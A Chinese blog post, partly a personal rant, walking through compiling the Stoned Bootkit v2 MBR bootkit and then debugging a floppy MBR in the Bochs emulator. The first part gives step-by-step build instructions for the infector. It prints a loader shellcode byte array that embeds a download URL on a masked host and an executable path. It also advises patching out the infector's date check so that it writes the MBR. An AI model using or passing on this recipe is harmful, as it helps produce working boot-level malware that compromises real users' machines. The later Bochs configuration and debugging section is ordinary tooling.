关于Stoned Bootkit v2编译和Bochs调试软盘MBR的吐槽(伤不起啊..)

     昨天晚上弄着弄着搞到2点多,早上眼睛睁开,6点40,想着问题没解决,很是不爽,脑海里浮现n种方案(n>2),果断下床继续干活.天不负我..泪流满面.终于停在该死的0x7c00上面了..阿西..上图

    图片发到微薄上就删了..大家将就着看吧.

    下面不是进入正题,今天没有正题,今天就是吐槽...

    前几天看群里三哥发了鬼影3的无壳样本,决心分析一下,结果无奈不是exe,只有mbr的饼(bin),无望(现在搞懂调试了可以看看,啊哈哈哈哈哈),网上找资料发现有一个德国的靓仔,把一个bootkit整个放出来了,不过是隔了一段时间的,应该是他参加black hat 2009的时候的产物,最终放出来的版本是v2,2010年年初完成的.mb的人家19岁啊有木有,长得帅啊有木有,年轻有为的黑客啊有木有.应女性观众的要求上作者生活照一张,去求交往吧,Peter Kleissner:

    (看着镜子:你这个死宅男,死胖纸...)

    Stoned Bootkit,一个强悍的mbr病毒框架吧(用的好了可以用做计算机取证用,所以说mbr病毒框架也不太好),对于bootkit的主题,基本上是asm写的,编译用nasm,编译过程相当吐血,主要是用的工具太多.(Stoned Bootkit v2编译,怎么编译,编译设置,成功编译Stoned Bootkit),关键词骗百度的,大家无视.

/*You need following software for compiling and testing: - Netwide Assembler (to compile the bootkit) - Perl (for various compiling scripts) - Microsoft Visual Studio 2010 Beta 2 (to compile the infector) - Microsoft Visual Studio 2008 (for the compatible v90 library) - Bochs, Qemu, VirtualBox (for emulation testing) - Windows debugger Windbg (to test the finally bootkit) - Windows Driver Kit (to compile the drivers) - Windows Automated Installation Kit (to create the Live CD)============ Compile ============You need nasm in the path and Visual Studio 2008 to compile the entire Stoned Bootkit. 1. Compile the modules: /Boot Code/Kernel Modules/Boot Module/release.bat /Boot Code/Kernel Modules/Bootloader/release.bat /Boot Code/Kernel Modules/Crypto Module/release.bat /Boot Code/Kernel Modules/Disk System/release.bat /Boot Code/Kernel Modules/System Loader/release Windows Pwn.bat /Boot Code/Kernel Modules/Textmode User Interface/release.bat 2. Copy proprietary (binary) module "Windows.sys" to /Boot Code/Boot Records/Binary Includes/Stoned System Files NOTE! THIS MODULE IS REQUIRED. READ BELOW HOW TO GET IT. DO NOT USE STOLEN OR MODIFIED MODULES FROM THE INTERNET. 3. Compile the Bootloader and the Memory Image of the bootkit: Boot Records.bat 4. Compile the Windows drivers (required!): In the Windows x86 Free Build Environment go to /BOOTCO~1/Drivers/CONSOL~1/ and execute 1. cl.exe @cl.rsp cmd.c 2. link @link.rsp cmd.obj Do the same with /STONED~1/BOOTCO~1/Drivers/EXELOA~1 1. cl.exe @cl.rsp ExeLoader.c 2. link @link.rsp ExeLoader.obj WARNING! cl.exe and link.exe do not allow white spaces in the directory name. Use dir /x to get short names. DO NOT SEND ME MAILS HOW TO COMPILE A DRIVER, IF YOU DO NOT KNOW HOW, LEAVE IT. 4. Open Infector.sln and compile! NOTE: Compile the infector only as Release (otherwise it will not infect the system)*/

    看到没有,asm,perl,vs2008,vs2010....未完...瞄的我只有vs2008,里面是说infector工程要用vs2010编译,但是实际上用vs2008就可以了,不过有一些额外的步骤,下面会说到.说点注意事项:

    1. Compile the modules,这个没有什么难点,作者提供了nasm,你如果不想加到系统path里面可以学我,copy一下放到system32文件夹下就可以了,这个按步骤运行批处理就OK了.

    2. 在Kernel Modules下有一个windows文件夹,里面有release.cmd,运行就可以得到windows.sys

    3. Boot Record文件夹下有release.cmd,你懂的

    4. 作者的意思是,如果你不会编译驱动,你就不要玩了,注意一下,里面的cl.rsp和link.rsp需要修改WDK的路径,下面是我的版本,你可以照着改,就是改成你WDK文件夹路径,我是用绝对路径:

/*//只给出要改的行,自己对照下//cl.rsp: /IC:/WinDDK/7600.16385.1/inc/api /IC:/WinDDK/7600.16385.1/inc/api /IC:/WinDDK/7600.16385.1/inc/ddk /IC:/WinDDK/7600.16385.1/inc/ddk /IC:/WinDDK/7600.16385.1/inc/crt /FIC:/WinDDK/7600.16385.1/inc/api/warning.h//link.rsp:C:/WinDDK/7600.16385.1/lib/wlh/i386/ntoskrnl.lib C:/WinDDK/7600.16385.1/lib/wlh/i386/hal.lib C:/WinDDK/7600.16385.1/lib/wlh/i386/wmilib.lib C:/WinDDK/7600.16385.1/lib/wlh/i386/ndis.lib */

     在编译Exe Loader的时候需要用到一个Loader Shellcode.cpp的文件,这个文件是利用perl脚本bin2hex.pl对Loader Shellcode.sys进行shellcode的提取,如下,你也可以用winhex自己提取,如图,最终记得把变量名改为bin_data1就可以了

/* begin binary data: */unsigned char bin_data1[] = /* 396 */{0x60,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xE8,0xFF,0xFF,0xFF,0xFF,0xC1,0x5D,0x90,0x8B,0x5C,0x24,0x24,0x8D,0xB5,0x62,0x01,0x00,0x00,0x83,0x3B,0x00,0x74,0x10,0x8D,0xB5,0x49,0x01,0x00,0x00,0x83,0x3B,0x01,0x74,0x05,0xE9,0x94,0x00,0x00,0x00,0x89,0x33,0x8B,0x5C,0x24,0x24,0x83,0x7B,0x08,0x00,0x75,0x41,0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x1C,0x8B,0x00,0x89,0xC1,0x89,0xC2,0x8D,0xBD,0x0B,0x01,0x00,0x00,0x8B,0x58,0x08,0x8B,0x07,0xE8,0x6E,0x00,0x00,0x00,0x09,0xC0,0x75,0x0A,0x8B,0x02,0x39,0xC8,0x74,0x5C,0x89,0xC2,0xEB,0xE8,0xAB,0x83,0x3F,0x00,0x75,0xE5,0x8B,0x5C,0x24,0x24,0xC7,0x43,0x08,0x01,0x00,0x00,0x00,0x8D,0xB5,0x0B,0x01,0x00,0x00,0x83,0xEC,0x10,0x89,0xE3,0x83,0xEC,0x44,0x89,0xE7,0x53,0x57,0xB8,0x44,0x00,0x00,0x00,0xAB,0xB9,0x10,0x00,0x00,0x00,0x31,0xC0,0xF3,0xAB,0x8B,0x84,0x24,0x80,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x30,0xFF,0x16,0x83,0xC4,0x54,0x8B,0x5C,0x24,0x24,0xFF,0x73,0x04,0xFF,0x56,0x04,0x31,0xC0,0x90,0x90,0x61,0xC2,0x04,0x00,0x51,0x56,0x55,0x52,0x95,0x8B,0x4B,0x3C,0x8B,0x4C,0x0B,0x78,0x01,0xD9,0x31,0xF6,0x8D,0x14,0xB3,0x03,0x51,0x20,0x8B,0x12,0x01,0xDA,0x31,0xC0,0xC1,0xC0,0x07,0x32,0x02,0x42,0x80,0x3A,0x00,0x75,0xF5,0x39,0xE8,0x74,0x0A,0x46,0x3B,0x71,0x18,0x72,0xDF,0x31,0xC0,0xEB,0x13,0x8B,0x51,0x24,0x01,0xDA,0x0F,0xB7,0x14,0x72,0x8B,0x41,0x1C,0x01,0xD8,0x8B,0x04,0x90,0x01,0xD8,0x5A,0x5D,0x5E,0x59,0xC3,0xC7,0x8A,0x31,0x46,0xD0,0xE0,0x7E,0x5E,0x00,0x00,0x00,0x00,0x75,0x72,0x6C,0x6D,0x6F,0x6E,0x00,0x99,0x23,0x5D,0xD9,0x00,0x00,0x00,0x00,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x78,0x78,0x78,0x2E,0x78,0x78,0x2E,0x78,0x78,0x78,0x2E,0x78,0x78,0x78,0x3A,0x34,0x37,0x32,0x35,0x2F,0x68,0x74,0x6F,0x71,0x71,0x67,0x66,0x00,0x43,0x3A,0x5C,0x53,0x74,0x6F,0x6E,0x65,0x64,0x5C,0x52,0x53,0x54,0x2D,0x53,0x65,0x72,0x76,0x65,0x72,0x2E,0x65,0x78,0x65,0x00,0x43,0x3A,0x5C,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x5C,0x53,0x79,0x73,0x74,0x65,0x6D,0x33,0x32,0x5C,0x63,0x61,0x6C,0x63,0x2E,0x65,0x78,0x65,0x00};/* end binary data. size = 396 bytes */

 

    这样就能顺利编译完驱动模块了.

    5.作者的工程项目使用的是vs2010建的,但是里面会用到vs2008的一些东西,你即使是在vs2010下编译也不会成功,在vs2008当中我们自己新建工程,然后把文件添加进来,我们需要编译两个工程,一个是attach file工程,生成一个attach file.exe,这个是用来将模块的bin文件绑定进infector.exe里面的,另外一个工程就是infector.exe咯,这个需要用release方式编译,如图:

   

    编译完之后复制回去Infector文件夹下的release文件夹,attach file.exe也复制进去,之后运行路径下的Attach File.cmd,把各个模块和MBR添加进去,之后得到的infector.exe就是内啥,你懂的.

    我没仔细看源代码,不过可以肯定的是,源代码当中对各个模块的注入(磁盘前63个扇区)可能不够完整,这个研究研究再跟大家分享.在infector里面对时间做了判断,如果不是2010年和大于2010年1月程序就不进行写mbr,大家自己找下这部分代码修改一下再编译吧.我懒,直接用OD patch,因为一开始没反应,我用OD调了才知道有判断时间.代码在function v2.cpp那个文件里,不要跟我说你找不到(找不到你就不要玩咯,啊哈哈哈哈哈)

    到了这里基本就ok了,可以试试效果了,但是编译出来的infector.exe是不完美的,要继续研究研究,上图

    接下来聊一聊怎么用bochs调mbr.其实网上有位Cryin前辈已经给出了很详细的说明,但是是基于安装了系统的,我使用的方法是调试软驱的mbr,软驱知道吧.这个已经被淘汰的产物,1.44MB的磁盘,A:/有木有啊,泪流满面.Cryin前辈的两篇文章链接,有爱的同学请猛击:

    http://bbs.pediy.com/showthread.php?p=881161

    http://bbs.pediy.com/showthread.php?t=121797

    如何利用Bochs调试软驱的mbr(bochs调试mbr,软驱调试,方法,步骤),又是关键字,为什么要说个又字..

    其实很简单啦,只是你按照网上资料,各种复杂各种情况,只能一个个试,而且我最后才知道自己是配置文件的问题,蛋疼.

    1.首先就用bximage.exe创建一个1.44M的文件,在一开始选hd还是fd的时候选fd(hd是默认),我建议是不要直接生成后缀名为img的文件,生成bin文件,把mbr写进去之后再改成img就可以了(因为winhex会认img文件,修改的时候各种蛋疼).

    2.用16进制编辑器把你要调试的mbr复制到1.44文件的开头处就OK了

    3.之后是修改配置文件,参考我的:

/*# *********************************************# The bochsrc file for the MBR testing# *********************************************# set the present memory (64 MB)megs: 32# filename of ROM imagesromimage: file="F:/SoftWare/Bochs-2.4.6/BIOS-bochs-latest"vgaromimage: file="F:/SoftWare/Bochs-2.4.6/VGABIOS-lgpl-latest"# define the Floppy Drive (althought the ToasterOS doesn't support Floppy Drives - just to test)floppya: 1_44="passwd.img", status=inserted# set the IDE devicesata0: enabled=1, ioaddr1=0x1f0, ioaddr2=0x3f0, irq=14# define the IDE devices# ata0-master: type=disk, path="Image.img", mode=flat, translation=lba# ata0-slave: type=cdrom, path="Native CD.iso", status=inserted# define the boot diskboot: floppy# choose the config interfaceconfig_interface: textconfig# logfileslog: logfile.txtdebugger_log: debugger.out# the PS/2 mousemouse: enabled=0*/

     网上有一些教程使用的是romimage: file=BIOS-bochs-latest, address=0xf0000这样一句,但是在2.3.5的bochs之后,BIOS长度增加为128k,如果加入address这句会提示Message: ROM: System BIOS must end at 0xfffff,里面的passwd.img是用来调试Cryin前辈的MBR密码程序,晒图:

     增加一个批处理,用于调试:

/*@ECHO OFFclsIF EXIST "debugger.out" del "debugger.out"IF EXIST "logfile.txt" del "logfile.txt"set BXSHARE=F:/SoftWare/Bochs-2.4.6/%BXSHARE%bochsdbg.exe -q -f bochsrc.bxrc@ECHO ON@ECHO OFF*/

     至此,已经可以调试MBR了,具体的调试命令可以参考tk教主文章: http://www.xfocus.net/releases/200408/a722.html

     当然如果想要调bootkit,还是要在brchs里面装个XP的才好..据闻装起来要20+个小时.无力...